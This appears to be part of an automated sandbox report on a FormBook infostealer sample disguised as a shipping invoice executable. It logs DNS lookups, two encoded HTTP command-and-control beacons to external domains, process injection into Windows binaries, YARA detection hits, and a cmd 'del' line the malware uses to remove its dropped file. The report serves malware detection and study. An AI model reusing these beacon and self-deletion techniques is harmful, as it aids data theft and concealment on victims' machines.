Oct 23, 2024 15:03:11.112498045 CEST	192.168.2.8	1.1.1.1	0x3e58	Standard query (0)	www.epehr.pics	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:03:33.562748909 CEST	192.168.2.8	1.1.1.1	0xd7e1	Standard query (0)	www.hqm-during.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 23, 2024 14:59:47.259531021 CEST	1.1.1.1	192.168.2.8	0x96e5	Name error (3)	www.eader-aaexvn.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:07.091772079 CEST	1.1.1.1	192.168.2.8	0xfd26	Name error (3)	www.ebaoge318.top	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:26.386356115 CEST	1.1.1.1	192.168.2.8	0xd1eb	No error (0)	www.9net88.net	94950.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 23, 2024 15:00:26.386356115 CEST	1.1.1.1	192.168.2.8	0xd1eb	No error (0)	94950.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:48.638511896 CEST	1.1.1.1	192.168.2.8	0x4e0e	No error (0)	www.xhyx.top		154.197.26.133	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:48.638545036 CEST	1.1.1.1	192.168.2.8	0x4e0e	No error (0)	www.xhyx.top		154.197.26.133	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:07.545090914 CEST	1.1.1.1	192.168.2.8	0x93aa	Name error (3)	www.rbuds.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:28.043119907 CEST	1.1.1.1	192.168.2.8	0xd6af	Name error (3)	www.acifictechnologycctv.net	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:48.495254993 CEST	1.1.1.1	192.168.2.8	0x2631	Name error (3)	www.isit-txax.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:09.388504982 CEST	1.1.1.1	192.168.2.8	0x5338	Name error (3)	www.ithin-ksvodn.xyz	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:30.261053085 CEST	1.1.1.1	192.168.2.8	0x9b22	No error (0)	www.rasko.net		89.184.73.149	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:50.665473938 CEST	1.1.1.1	192.168.2.8	0x7172	Name error (3)	www.lsader.app	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:03:11.123960972 CEST	1.1.1.1	192.168.2.8	0x3e58	Name error (3)	www.epehr.pics	none	none	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:03:33.574472904 CEST	1.1.1.1	192.168.2.8	0xd7e1	Name error (3)	www.hqm-during.xyz	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.9net88.net

www.xhyx.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	199.59.243.227	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 15:00:26.393623114 CEST	168	OUT	GET /ge07/?FXT8AF=2dkTOn9Hj2ox&T8itM8U=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tPZEr4Tl6UO HTTP/1.1 Host: www.9net88.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	154.197.26.133	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 15:00:48.644840956 CEST	166	OUT	GET /ge07/?T8itM8U=nFq8hlOZkZdpcl2LrU6NtCobGyYRF4oO9voe8xIKTNUMBh2BLqz18CwKfuceLAjhfH+x&FXT8AF=2dkTOn9Hj2ox HTTP/1.1 Host: www.xhyx.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	08:59:07
Start date:	23/10/2024
Path:	C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"
Imagebase:	0x400000
File size:	1'092'191 bytes
MD5 hash:	0BEE5945FAACACCE5AE1481E51A3AA76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	08:59:08
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"
Imagebase:	0x2e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	08:59:09
Start date:	23/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	08:59:11
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x440000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	08:59:14
Start date:	23/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	08:59:15
Start date:	23/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true